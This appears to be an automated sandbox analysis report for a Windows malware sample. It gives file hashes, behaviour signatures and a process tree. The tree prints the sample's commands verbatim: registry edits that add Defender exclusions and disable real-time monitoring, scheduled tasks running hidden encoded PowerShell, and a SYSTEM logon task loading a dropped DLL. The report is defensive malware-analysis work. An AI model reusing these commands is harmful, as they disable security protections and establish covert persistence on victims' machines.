Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
18/10/2022, 19:13
General
-
Target
089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe
-
Size
7.3MB
-
MD5
14444765d3a9c6b797dc13e1d7638015
-
SHA1
614b3ece34cfc0639d4e8ff265986a50ad8b620e
-
SHA256
089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b
-
SHA512
4c95f3b1cbecfc1539314d32e08a7880e68c09c2a9ac68fcd8977fb8d0586823e4117b037471fb3e3827e10553a6a75c15a494d5e66b64969b55e96a13b8a4ed
-
SSDEEP
196608:91ONXlHf3ztl2mVmZXKo9jGHsowhFNMewhOOGsv01G:3ONXlHDZ8gG1WxGsGG
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 8 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe"C:\Users\Admin\AppData\Local\Temp\089c9a7d4a37db54b685faf90b9f9869833b8376b4a472852292b3b318f04b2b.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSFC88.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSFFF2.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNUBhwrEX" /SC once /ST 17:33:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNUBhwrEX"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNUBhwrEX"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNLHXISkhsXtOdkcGZ" /SC once /ST 21:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo\poQmgQVzVdhdRIL\XbRQhxd.exe\" pf /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E41CE510-1E80-4119-9A90-23291ED94659} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {D032818C-3EDF-4EF1-A70A-28F594733ED9} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo\poQmgQVzVdhdRIL\XbRQhxd.exeC:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo\poQmgQVzVdhdRIL\XbRQhxd.exe pf /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLEYfvQGp" /SC once /ST 03:35:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLEYfvQGp"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLEYfvQGp"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCjiOLFeH" /SC once /ST 18:30:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCjiOLFeH"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCjiOLFeH"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\EIQZTJtBDLOiQZhk\UcpllFaA\UyEIHgVzHTlqNirV.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\EIQZTJtBDLOiQZhk\UcpllFaA\UyEIHgVzHTlqNirV.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JyOCsvAdkzLU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JyOCsvAdkzLU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsEHNtqxqlZKC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsEHNtqxqlZKC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bIbJMpHiU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bIbJMpHiU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gqlmldGVSRUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gqlmldGVSRUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BxsbYgSZTNUxiiVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BxsbYgSZTNUxiiVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ExLGzlxVXqmAOBuRcxR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JyOCsvAdkzLU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JyOCsvAdkzLU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsEHNtqxqlZKC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsEHNtqxqlZKC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bIbJMpHiU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bIbJMpHiU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gqlmldGVSRUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gqlmldGVSRUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BxsbYgSZTNUxiiVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BxsbYgSZTNUxiiVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DOPPtyDuQWtojawbo" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\EIQZTJtBDLOiQZhk" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcJaevCJY" /SC once /ST 03:06:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcJaevCJY"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcJaevCJY"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AKVOOjzszwLKFadpj" /SC once /ST 07:37:22 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EIQZTJtBDLOiQZhk\sEzFwEFWTTreWYX\atOUmKy.exe\" Jb /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AKVOOjzszwLKFadpj"3⤵
-
-
-
C:\Windows\Temp\EIQZTJtBDLOiQZhk\sEzFwEFWTTreWYX\atOUmKy.exeC:\Windows\Temp\EIQZTJtBDLOiQZhk\sEzFwEFWTTreWYX\atOUmKy.exe Jb /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNLHXISkhsXtOdkcGZ"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\bIbJMpHiU\jBleqt.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bnPMwlkfsyaLVIF" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD5d7eb640fef2812eabf99cf1dc15209e9
SHA141fbfdc644d1c418e1bdab0618e60e8159054e7d
SHA2568af4a341c8563248cb617a144c347092eedab4dbcf0e11c8361004c68353a2ca
SHA512ca11607fbfa4190edddfcc9c15855eeb988053a304ea9f3eff5b500f93a04268d4ab567bfc62636c5ad3483cc3e245f08984862e7a940111c6fb3ae5f61a542d
-
Filesize
6.3MB
MD5d7eb640fef2812eabf99cf1dc15209e9
SHA141fbfdc644d1c418e1bdab0618e60e8159054e7d
SHA2568af4a341c8563248cb617a144c347092eedab4dbcf0e11c8361004c68353a2ca
SHA512ca11607fbfa4190edddfcc9c15855eeb988053a304ea9f3eff5b500f93a04268d4ab567bfc62636c5ad3483cc3e245f08984862e7a940111c6fb3ae5f61a542d
-
Filesize
6.8MB
MD5d7bad896faa172aadd9fd583c99302d9
SHA1c3906450969dafe3e804616d3ab7eafc17c6f494
SHA256883e70e97259bad8bf1831d12599feb61912cedb5ab56bbbdb960015a9669a82
SHA512bc989b2def418cbf2a94398f63270ff4b61774fa25bb44a15a0f1245da837c13b91fb9d7fa9ff85d74e97138f944b061a75b085a68b0484465ce4536d4e8aa80
-
Filesize
6.8MB
MD5d7bad896faa172aadd9fd583c99302d9
SHA1c3906450969dafe3e804616d3ab7eafc17c6f494
SHA256883e70e97259bad8bf1831d12599feb61912cedb5ab56bbbdb960015a9669a82
SHA512bc989b2def418cbf2a94398f63270ff4b61774fa25bb44a15a0f1245da837c13b91fb9d7fa9ff85d74e97138f944b061a75b085a68b0484465ce4536d4e8aa80
-
Filesize
6.8MB
MD5d7bad896faa172aadd9fd583c99302d9
SHA1c3906450969dafe3e804616d3ab7eafc17c6f494
SHA256883e70e97259bad8bf1831d12599feb61912cedb5ab56bbbdb960015a9669a82
SHA512bc989b2def418cbf2a94398f63270ff4b61774fa25bb44a15a0f1245da837c13b91fb9d7fa9ff85d74e97138f944b061a75b085a68b0484465ce4536d4e8aa80
-
Filesize
6.8MB
MD5d7bad896faa172aadd9fd583c99302d9
SHA1c3906450969dafe3e804616d3ab7eafc17c6f494
SHA256883e70e97259bad8bf1831d12599feb61912cedb5ab56bbbdb960015a9669a82
